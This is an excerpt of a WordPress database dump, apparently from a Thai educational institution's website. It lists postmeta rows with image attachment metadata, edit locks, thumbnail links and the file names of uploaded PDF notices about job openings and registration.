(26463, 10693, '_wp_attached_file', '2020/10/221063-03.jpg'),
(26464, 10693, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/221063-03.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"221063-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"221063-03-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"221063-03-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"221063-03-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"221063-03-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26465, 10694, '_wp_attached_file', '2020/10/221063-02.jpg'),
(26466, 10694, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/221063-02.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"221063-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"221063-02-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"221063-02-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"221063-02-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"221063-02-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26467, 10695, '_wp_attached_file', '2020/10/221063-01.jpg'),
(26468, 10695, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/221063-01.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"221063-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"221063-01-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"221063-01-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"221063-01-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"221063-01-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26469, 10689, '_thumbnail_id', '10695'),
(26472, 10689, '_hide_featured', NULL),
(26475, 10697, '_edit_lock', '1603333825:14'),
(26476, 10697, '_edit_last', '14'),
(26477, 10697, '_thumbnail_id', '10694'),
(26480, 10697, '_hide_featured', NULL),
(26485, 10699, '_edit_lock', '1603333899:14'),
(26486, 10699, '_edit_last', '14'),
(26487, 10699, '_thumbnail_id', '10693'),
(26490, 10699, '_hide_featured', NULL),
(26495, 10701, '_edit_lock', '1603333990:14'),
(26496, 10701, '_edit_last', '14'),
(26497, 10701, '_thumbnail_id', '10692'),
(26500, 10701, '_hide_featured', NULL),
(26505, 10703, '_edit_lock', '1603334061:14'),
(26506, 10703, '_edit_last', '14'),
(26507, 10703, '_thumbnail_id', '10691'),
(26510, 10703, '_hide_featured', NULL),
(26517, 10705, '_edit_lock', '1603336075:14'),
(26518, 10705, '_edit_last', '14'),
(26519, 10705, '_thumbnail_id', '10690'),
(26522, 10705, '_hide_featured', NULL),
(26525, 10708, '_edit_lock', '1604277791:14'),
(26526, 10708, '_edit_last', '14'),
(26527, 10709, '_wp_attached_file', '2020/11/021163-09.jpg'),
(26528, 10709, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/11/021163-09.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021163-09-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021163-09-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021163-09-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021163-09-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021163-09-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26529, 10710, '_wp_attached_file', '2020/11/021163-08.jpg'),
(26530, 10710, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/11/021163-08.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021163-08-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021163-08-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021163-08-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021163-08-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021163-08-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26531, 10711, '_wp_attached_file', '2020/11/021163-07.jpg'),
(26532, 10711, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/11/021163-07.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021163-07-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021163-07-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021163-07-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021163-07-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021163-07-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26533, 10712, '_wp_attached_file', '2020/11/021163-06.jpg'),
(26534, 10712, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/11/021163-06.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021163-06-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021163-06-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021163-06-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021163-06-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021163-06-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26535, 10713, '_wp_attached_file', '2020/11/021163-04.jpg'),
(26536, 10713, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/11/021163-04.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021163-04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021163-04-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021163-04-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021163-04-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021163-04-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26537, 10714, '_wp_attached_file', '2020/11/021163-03.jpg'),
(26538, 10714, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/11/021163-03.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021163-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021163-03-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021163-03-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021163-03-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021163-03-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26539, 10715, '_wp_attached_file', '2020/11/021163-02.jpg'),
(26540, 10715, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/11/021163-02.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021163-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021163-02-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021163-02-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021163-02-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021163-02-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26541, 10716, '_wp_attached_file', '2020/11/021163-01.jpg'),
(26542, 10716, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/11/021163-01.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021163-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021163-01-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021163-01-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021163-01-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021163-01-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26543, 10717, '_wp_attached_file', '2020/11/021163-05.jpg'),
(26544, 10717, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1356;s:6:\"height\";i:2048;s:4:\"file\";s:21:\"2020/11/021163-05.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021163-05-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021163-05-199x300.jpg\";s:5:\"width\";i:199;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"021163-05-768x1160.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021163-05-678x1024.jpg\";s:5:\"width\";i:678;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021163-05-199x300.jpg\";s:5:\"width\";i:199;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26545, 10708, '_thumbnail_id', '10716'),
(26548, 10708, '_hide_featured', NULL),
(26553, 10719, '_edit_lock', '1604277835:14'),
(26554, 10719, '_edit_last', '14'),
(26555, 10719, '_thumbnail_id', '10715'),
(26558, 10719, '_hide_featured', NULL),
(26563, 10721, '_edit_lock', '1604277872:14'),
(26564, 10721, '_edit_last', '14'),
(26565, 10721, '_thumbnail_id', '10714'),
(26568, 10721, '_hide_featured', NULL),
(26571, 10723, '_edit_lock', '1604277915:14'),
(26572, 10723, '_edit_last', '14'),
(26573, 10723, '_thumbnail_id', '10713'),
(26576, 10723, '_hide_featured', NULL),
(26579, 10725, '_edit_lock', '1604278032:14'),
(26580, 10725, '_edit_last', '14'),
(26583, 10725, '_hide_featured', NULL),
(26586, 10727, '_edit_lock', '1604278079:14'),
(26587, 10727, '_edit_last', '14'),
(26588, 10727, '_thumbnail_id', '10712'),
(26591, 10727, '_hide_featured', NULL),
(26594, 10730, '_edit_lock', '1604278242:14'),
(26595, 10730, '_edit_last', '14'),
(26596, 10730, '_thumbnail_id', '10711'),
(26599, 10730, '_hide_featured', NULL),
(26608, 10732, '_edit_lock', '1604278297:14'),
(26609, 10732, '_edit_last', '14'),
(26610, 10732, '_thumbnail_id', '10710'),
(26613, 10732, '_hide_featured', NULL),
(26616, 10734, '_edit_lock', '1604282226:14'),
(26617, 10734, '_edit_last', '14'),
(26618, 10734, '_thumbnail_id', '10709'),
(26621, 10734, '_hide_featured', NULL),
(26624, 10736, '_wp_attached_file', '2019/12/021163-01.jpg'),
(26625, 10736, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:591;s:4:\"file\";s:21:\"2019/12/021163-01.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021163-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"021163-01-300x71.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:71;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021163-01-768x183.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:183;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021163-01-1024x244.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:244;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"021163-01-400x95.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:95;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26626, 10738, '_edit_lock', '1604299745:14'),
(26627, 10738, '_edit_last', '14'),
(26628, 10739, '_wp_attached_file', '2020/11/ขั้นตอนการเข้าระบบลงทะเบียน-โปรแกรม-ศธ.pdf'),
(26631, 10738, '_hide_featured', NULL),
(26650, 10748, '_wp_attached_file', '2019/12/021163-02.jpg'),
(26651, 10748, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:591;s:4:\"file\";s:21:\"2019/12/021163-02.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021163-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"021163-02-300x71.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:71;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021163-02-768x183.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:183;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021163-02-1024x244.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:244;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"021163-02-400x95.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:95;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26652, 10750, '_edit_lock', '1604462401:14'),
(26653, 10750, '_edit_last', '14'),
(26654, 10751, '_wp_attached_file', '2020/11/ประกาศรายชื่อ.pdf'),
(26657, 10750, '_hide_featured', NULL),
(26660, 10754, '_edit_lock', '1604367108:14'),
(26661, 10754, '_edit_last', '14'),
(26662, 10755, '_wp_attached_file', '2020/11/รับสมัครครูสอนภาษาอังกฤษ.pdf'),
(26665, 10754, '_hide_featured', NULL),
(26670, 10757, '_edit_lock', '1604367289:14'),
(26671, 10757, '_edit_last', '14'),
(26672, 10758, '_wp_attached_file', '2020/11/รับสมัครช่างไฟ.pdf'),
(26675, 10757, '_hide_featured', NULL),
(26681, 10763, '_wp_attached_file', '2020/11/แบบฟอร์ม-สผ.แผนก.doc'),
(26682, 10764, '_wp_attached_file', '2020/11/แบบฟอร์ม-สผ.งาน.doc'),
(26683, 10766, '_edit_lock', '1604459187:14'),
(26684, 10766, '_edit_last', '14'),
(26689, 10772, '_edit_lock', '1604459476:14'),
(26690, 10772, '_edit_last', '14'),
(26691, 10774, '_edit_lock', '1604462522:14'),
(26692, 10774, '_edit_last', '14'),
(26693, 10775, '_wp_attached_file', '2020/11/รับสมัคร-IT.pdf'),
(26696, 10774, '_hide_featured', NULL),
(26703, 10779, '_edit_lock', '1604462811:14'),
(26704, 10779, '_edit_last', '14'),
(26705, 10780, '_wp_attached_file', '2020/11/ประกาศรายชื่อ-จนท.ทะเบียน.pdf'),
(26708, 10779, '_hide_featured', NULL),
(26713, 10784, '_edit_lock', '1605256577:14'),
(26714, 10784, '_edit_last', '14'),
(26715, 10785, '_wp_attached_file', '2020/11/รับสมัครงานหลักสูตรและคนงาน.pdf'),
(26718, 10784, '_hide_featured', NULL),
(26731, 10787, '_edit_lock', '1605495909:14'),
(26732, 10787, '_edit_last', '14'),
(26733, 10788, '_wp_attached_file', '2020/11/161163-08.jpg'),
